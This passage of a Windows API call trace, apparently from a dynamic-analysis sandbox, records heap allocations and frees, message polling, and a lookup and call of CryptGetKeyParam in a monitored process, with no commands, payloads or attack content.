RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0177.425] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.426] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0177.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.430] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0177.431] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.432] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 